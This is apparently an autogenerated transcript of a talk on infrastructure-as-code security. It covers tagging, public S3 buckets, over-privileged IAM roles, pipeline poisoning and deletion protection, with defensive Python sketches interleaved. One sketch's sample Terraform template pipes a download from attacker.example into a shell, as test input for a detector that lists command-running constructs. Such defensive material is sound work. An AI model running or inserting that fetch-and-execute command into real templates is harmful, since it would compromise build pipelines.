Transcript
This transcript was autogenerated. To make changes, submit a PR.
Hi everyone, thank you for joining my session.
Today I'll be talking about infrastructure as code
security best practices and strategies.
Before we start, let me introduce myself.
I am Joshua Arvin Lat and I am the chief technology
officer of NuWorks Interactive Labs.
I'm also an AWS Machine Learning Hero.
I am also the author of the books Machine Learning with Amazon SageMaker
Cookbook, Machine Learning Engineering on AWS,
and Building and Automating Penetration Testing Labs in
the Cloud. Next year there will be a new book,
and it's called Learning Serverless Security. So if you're into cloud
security, then this book is for you. So let's
begin. In the past, we usually thought
of web applications as more or less single
components. After a while, we realized
that there are several parts to them, like the front
end, the back end, and
also the database. The front end connects to the back end,
and the back end connects to the database. Basically, this is
still the same web application that serves
the end users. The more we use the cloud
and the more complex the system gets, the more components
it has. So for example, if you have an architecture
like this, where you have several components like a CDN,
a load balancer, as well as the servers,
then we're able to make the system more resilient,
especially if the servers can auto scale depending
on how many users are using the application.
So if there are two to three times more users, then maybe we
can add more servers inside the setup. This is one
of the advantages of having a distributed setup, but of course it would
involve more resources and more components.
At the same time, if we want to incorporate security
resources like firewalls, then we can easily add those
and bind them to existing components.
Thus, when it comes to discussions, it may make
sense to think of architectures in terms of
different building blocks. Each building block has a
purpose, and multiple building blocks are grouped together
to perform specific functions, like protecting against
certain types of attacks or allowing the system to scale when
there's a lot of traffic. That said,
when working with a lot of resources,
it becomes more important for
us to manage these resources in a way that allows us
to configure them in a more efficient manner.
One of the techniques available is the
use of infrastructure as code tools and solutions
to convert a complex infrastructure into
templates. When I say templates, these are basically
just text files containing the configuration
of the resources which would be created.
Once you have these infrastructure
as code templates, you are able to build
multiple environments from the same template.
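A minimal Python sketch of the "one template, several environments" idea. The template format, the parameter names (`server_size`, `server_count`), and the values are all hypothetical and do not correspond to any particular IaC tool.

```python
import json
from string import Template

# Hypothetical template: one text file describing the resources to create.
# The keys are illustrative only, not a real IaC tool's schema.
TEMPLATE = Template("""{
  "environment": "$env",
  "server": {"size": "$server_size", "count": $server_count}
}""")

# Hypothetical per-environment parameters; production gets larger resources.
PARAMETERS = {
    "staging": {"server_size": "small", "server_count": 1},
    "production": {"server_size": "large", "server_count": 4},
}


def render(env: str) -> dict:
    """Fill the shared template with one environment's parameters."""
    text = TEMPLATE.substitute(env=env, **PARAMETERS[env])
    return json.loads(text)
```

Calling `render("staging")` and `render("production")` produces two configurations from the same text, differing only in the parameters supplied.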
So for example, if we have a staging environment and a
production environment, both of those environments can
come from the same template, and of course they would
be configured a bit differently with the right configuration
parameters. So more or less you have a template,
a text file, and then you would have various
configuration parameters depending on where you're going to
deploy the resources. So if it's a staging environment,
then there would be a staging configuration, and if it's the
production environment, then you would have the corresponding
production configuration with, of course, larger resources
deployed in a production setting. So one
of the best practices when building environments,
especially in the cloud, using IaC tools
such as Terraform
is to create separate IAM roles,
or basically security configurations, and bind
those to cloud resources. So at
the moment you're probably asking why.
That's because, number one, each of the resources needs to
be tagged properly, and each of the resources should be
properly configured as well. After tagging
those resources one at a time, you're able
to properly manage the assets: you're
able to count and identify which resources have been created,
which ones are missing, which ones need to be modified,
and which resources need a specific set
of permissions. From there, you're able to identify
which could be a weak link when it comes to security.
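The tagging check described here could be sketched in Python as follows. The inventory, the resource ids, and the required tag names are assumptions made for illustration; in practice the list would come from the cloud provider's API or the IaC tool's state.

```python
# Assumed tagging policy: every resource must carry these tag keys.
REQUIRED_TAGS = {"owner", "environment"}

# Hypothetical inventory, hard-coded here only to keep the sketch runnable.
RESOURCES = [
    {"id": "web-server-1", "tags": {"owner": "team-a", "environment": "staging"}},
    {"id": "db-1", "tags": {"owner": "team-b"}},
    {"id": "bucket-1", "tags": {}},
]


def missing_tags(resources, required=REQUIRED_TAGS):
    """Map each resource id to the sorted list of required tags it lacks."""
    report = {}
    for resource in resources:
        missing = required - set(resource["tags"])
        if missing:
            report[resource["id"]] = sorted(missing)
    return report
```

Resources that show up in the report are the ones that cannot yet be counted, attributed, or reviewed reliably.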
So when building infrastructure resources
using IaC tools, it's important to avoid insecure defaults
and, of course, regularly check for announcements from cloud platforms.
The tricky part with using infrastructure as code is that
the templates and examples available online may already be
outdated. And there are some cases where the
configuration specified in those default templates may
end up being insecure, meaning they may have security vulnerabilities.
In some cases, when you use generative AI tools
to generate these types of templates, you might end
up producing something which is already
insecure, something which has vulnerabilities.
A good example of this would be an S3 bucket created
using IaC. If you accidentally opened
that bucket for access to anyone in the world,
then anything you store inside that storage container could easily
be accessed and downloaded by everyone else. So if
that storage contains,
let's say, a database dump or
a set of files containing very sensitive information, then it's
going to affect your organization as well. So be
very careful about this and regularly check for announcements from
cloud platforms, especially if they decided to change
the defaults into something more secure.
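As an illustration, a check for publicly readable buckets might look like the Python sketch below. It assumes a template already parsed into a dictionary and shaped loosely like a CloudFormation template (`Resources`, `Type`, `Properties`, `AccessControl`); the talk does not name a template format, so this shape is an assumption, and the check covers only one way a bucket can be exposed.

```python
# Canned ACL values that grant access to anyone (assumed to be the only
# values of interest for this narrow check).
PUBLIC_ACLS = {"PublicRead", "PublicReadWrite"}


def public_buckets(template: dict) -> list:
    """Return the logical names of S3 buckets declared with a public ACL."""
    flagged = []
    for name, resource in template.get("Resources", {}).items():
        if resource.get("Type") != "AWS::S3::Bucket":
            continue
        acl = resource.get("Properties", {}).get("AccessControl")
        if acl in PUBLIC_ACLS:
            flagged.append(name)
    return flagged


# Hypothetical template with one exposed bucket and one private bucket.
EXAMPLE = {
    "Resources": {
        "BackupBucket": {
            "Type": "AWS::S3::Bucket",
            "Properties": {"AccessControl": "PublicRead"},
        },
        "LogsBucket": {
            "Type": "AWS::S3::Bucket",
            "Properties": {"AccessControl": "Private"},
        },
    }
}
```

Here `public_buckets(EXAMPLE)` flags only `BackupBucket`. Bucket policies and account-level settings can also expose data, so a real scanner would need to look at more than the ACL.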
This is important, especially if you use cloud
platforms like AWS, Azure, and GCP,
because even if you already have the IaC templates,
those templates may not automatically reflect
what has been announced recently. Now let's talk
about secret management and permission management.
IaC tools, of
course, require credentials,
something like a secret key or an access key, to
allow them to create resources inside the cloud platform.
So the challenge there is: what if you decided to
launch a server in a public
subnet, and inside that server you're going to run
the IaC templates? When I say run, you basically
have the IaC templates ready there and you use the
command line to convert those templates
into actual resources. In most cases,
developers and engineers would take the shortcut where
the server would have an IAM role
with super admin permissions. Of course, that would
allow you to run anything and build anything
from that server. Thus it's super convenient for the
engineers to have this type of setup. Unfortunately, the problem
there is that the server is
high risk because, for one thing, it's in the public subnet.
If it gets compromised, then anyone
who has access to that server would technically be able to
perform anything in that cloud environment.
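A simple way to spot this kind of "super admin" role is to look for a policy statement that allows every action on every resource. The Python sketch below assumes the policy is available as a dictionary in the standard IAM JSON policy layout (`Statement`, `Effect`, `Action`, `Resource`). It catches only the most obvious wildcard case, and the two example policies are made up.

```python
def _as_list(value):
    """IAM policies allow a single value or a list; normalize to a list."""
    return value if isinstance(value, list) else [value]


def is_admin_like(policy: dict) -> bool:
    """True if any Allow statement grants all actions on all resources."""
    for statement in _as_list(policy.get("Statement", [])):
        if statement.get("Effect") != "Allow":
            continue
        actions = _as_list(statement.get("Action", []))
        resources = _as_list(statement.get("Resource", []))
        if "*" in actions and "*" in resources:
            return True
    return False


# Hypothetical policies for illustration.
ADMIN_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}
SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["s3:GetObject"],
            "Resource": "arn:aws:s3:::example-bucket/*",
        }
    ],
}
```

A role carrying something like `ADMIN_POLICY` on a server in a public subnet is the risky combination described above; a policy scoped like `SCOPED_POLICY` limits what a compromised server can do.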
So right now you might be asking me why or how,
because so far I've just been talking about the concepts, and
most of us have no idea how these attacks are actually
performed. So getting
back to the example earlier, let's say that
you have a server where your IaC code is converted
into infrastructure, and that server has super admin permissions.
If that server gets compromised, what could possibly happen
next? There are a lot of things that can happen.
In some cases, if a team decides to use, let's say,
containers to do things, or maybe has
different IAM resources configured,
then any of these things could happen.
Maybe container escape is possible, especially if
you decided to utilize containers to run
IaC code inside them. A lot of people think
that using containers would be a
silver bullet. Unfortunately, if you accidentally run containers
with excessive permissions, it's also possible to perform container
escape. That is, someone inside the container
can access the server where the container is running.
The next step there is that once an attacker is inside
a server, IAM privilege escalation is possible,
meaning that someone with very
little permissions could technically find a
way to access the entire account using
the right set of steps. When I say the right set of steps, maybe other
IAM resources could be created, and those could then
be used to get extra access,
which would allow an attacker to perform malicious actions
or operations. That would include attacking other
organizations, deleting all the resources in
your account, and also creating super big resources,
which could end up closing the account. Also, in other
cases there could be databases or data stores which
contain sensitive information, and the extra access acquired
during privilege escalation can be used to access those
databases and data stores. The next best
practice would be to track and manage changes using version control tools.
The advantage of having IaC
solutions as part of the process is that you
have your infrastructure as code, and when you have
the resources as code, you're able to
keep them as files and use something like Git to
manage the changes. So if you have version one, version two,
and version three, then you can easily check and
iterate using a process very similar to what is
followed when developing web applications,
for example. So if you have a first version and then you have a new
version, instead of deploying that new version in
a production environment, you can test it out
first in a test or staging environment, and then
when you see that your application is unaffected, you
can get it deployed in a production environment.
So again, resources are now converted into
code. Everything you can do with code, you can now implement
in your IaC process.
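Because the templates are plain text, two versions can be compared line by line, which is what a version control tool shows in a diff. The Python sketch below uses the standard library's `difflib`; the two template versions and their syntax are invented for illustration.

```python
import difflib

# Two hypothetical versions of the same template (made-up syntax).
V1 = """\
resource web_server
  size = small
  subnet = public
"""

V2 = """\
resource web_server
  size = small
  subnet = private
"""


def changed_lines(old: str, new: str) -> list:
    """Return only the added and removed lines between two versions."""
    diff = difflib.unified_diff(
        old.splitlines(), new.splitlines(),
        fromfile="v1", tofile="v2", lineterm="",
    )
    # Keep "+"/"-" lines, skipping the "+++"/"---" file headers.
    return [
        line for line in diff
        if line.startswith(("+", "-")) and not line.startswith(("+++", "---"))
    ]
```

For these two versions, `changed_lines(V1, V2)` reports that the subnet line was removed and re-added with a new value, which is the kind of change a reviewer would want to see before it reaches production.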
So here we can see an analogy where
you have a picture of evolution.
You start with previous versions and then you
end up with more modern versions, which would probably
take a lot of iterations. And when you're
able to start this process well, then
you can easily find multiple variations. You can have
another version which makes use of previous
code bases. And again, you can reuse templates,
you can layer your templates, and you can make them as fine
grained as possible using the right set of techniques.
So again, I'm just re-emphasizing the point that
this is a very powerful technique for managing
IaC code, especially if you have
insecure defaults at the start and then you realize you
have to update the subnet configuration in your IaC code and
convert it into something more secure, so that the next time around
attackers won't be able to attack certain resources
now protected with the right configuration.
In addition to that, the moment you convert your infrastructure
into code, you can use pipelines to analyze security
vulnerabilities automatically. There are different ways to
analyze the code and the resources created
from the code, and you basically have these pipelines. So in
step one you have the code, you push it, and the pipeline gets activated.
However, it's important that we're very careful when
managing resources inside pipelines, because even
if we're able to detect security vulnerabilities inside the templates,
it's possible to have something like a poisoned pipeline
execution, especially when you're utilizing cloud resources
to run and convert these templates into actual
resources. For one thing, again, resources in
the cloud would probably have IAM roles attached
to them. So when
running templates inside these resources,
there's going to be an IAM role which is checked first
before specific actions can be performed. If that
IAM role has super admin permissions, then the problem
is that if there's a script or
a payload injected into the template,
then when the template runs and that
script gets executed, it
could be possible for something malicious to be executed
inside the pipeline environment itself. This is very
scary, because a lot of teams prioritize the
production systems, basically the web applications
and the resources there,
when it comes to securing their environments.
However, the weak link could be any
existing pipelines which are used by the development
teams. So again, make sure that everything deployed
in your environment is properly secured.
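One way a pipeline could look for injected scripts before running a template is to flag constructs that execute commands. The Python sketch below assumes Terraform-style templates and does a plain text search for the `local-exec` and `remote-exec` provisioners and the `external` data source. The list of patterns is an assumption and is not exhaustive, and a text match is only a prompt for human review, not proof of an attack.

```python
import re

# Terraform constructs that can run commands (assumed, non-exhaustive list).
RISKY_PATTERNS = {
    "local-exec provisioner": re.compile(r'provisioner\s+"local-exec"'),
    "remote-exec provisioner": re.compile(r'provisioner\s+"remote-exec"'),
    "external data source": re.compile(r'data\s+"external"'),
}


def risky_constructs(template_text: str) -> list:
    """Return the names of command-running constructs found in the text."""
    return [
        name for name, pattern in RISKY_PATTERNS.items()
        if pattern.search(template_text)
    ]


# Hypothetical template containing an injected command.
SAMPLE = '''
resource "null_resource" "example" {
  provisioner "local-exec" {
    command = "curl http://attacker.example/payload | sh"
  }
}
'''
```

Running `risky_constructs(SAMPLE)` flags the `local-exec` provisioner. Pairing a check like this with a narrowly scoped pipeline role limits what an injected command can do even if it slips through.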
Next, it's important to protect specific resources from accidental
deletion or modification. A lot of us
just think of IaC as a simple process where
we write code and then resources are created.
However, IaC involves modification and deletion as well.
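A guard against unwanted deletions could be sketched in Python as below. It assumes a plan exported as JSON in the shape produced by `terraform show -json` (a `resource_changes` list whose entries carry `address`, `type`, and `change.actions`); the set of protected types and the example plan are hypothetical.

```python
# Assumed policy: resource types that must never be deleted automatically.
PROTECTED_TYPES = {"aws_db_instance"}


def blocked_deletions(plan: dict, protected=PROTECTED_TYPES) -> list:
    """Return addresses of protected resources the plan would delete."""
    blocked = []
    for change in plan.get("resource_changes", []):
        actions = change.get("change", {}).get("actions", [])
        # A replacement shows up as both "delete" and "create".
        if change.get("type") in protected and "delete" in actions:
            blocked.append(change["address"])
    return blocked


# Hypothetical plan: the database would be destroyed, the server updated.
EXAMPLE_PLAN = {
    "resource_changes": [
        {
            "address": "aws_db_instance.production",
            "type": "aws_db_instance",
            "change": {"actions": ["delete"]},
        },
        {
            "address": "aws_instance.web",
            "type": "aws_instance",
            "change": {"actions": ["update"]},
        },
    ]
}
```

A pipeline could refuse to apply any plan for which `blocked_deletions` returns a non-empty list. Terraform also offers a `prevent_destroy` lifecycle setting that serves a similar purpose inside the template itself.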
So what if you created databases using
IaC code?
What if somebody suddenly deletes
the resources using an IaC solution?
Then your production databases could be deleted automatically
as well. So make sure you know the proper configuration
parameters to ensure that certain resources in
your infrastructure are not modified or deleted by
default when using IaC solutions. So that's
pretty much it. Today we learned a
lot of things, including how
to secure resources and systems built
using IaC tools. Thank you so much and
have a great day ahead.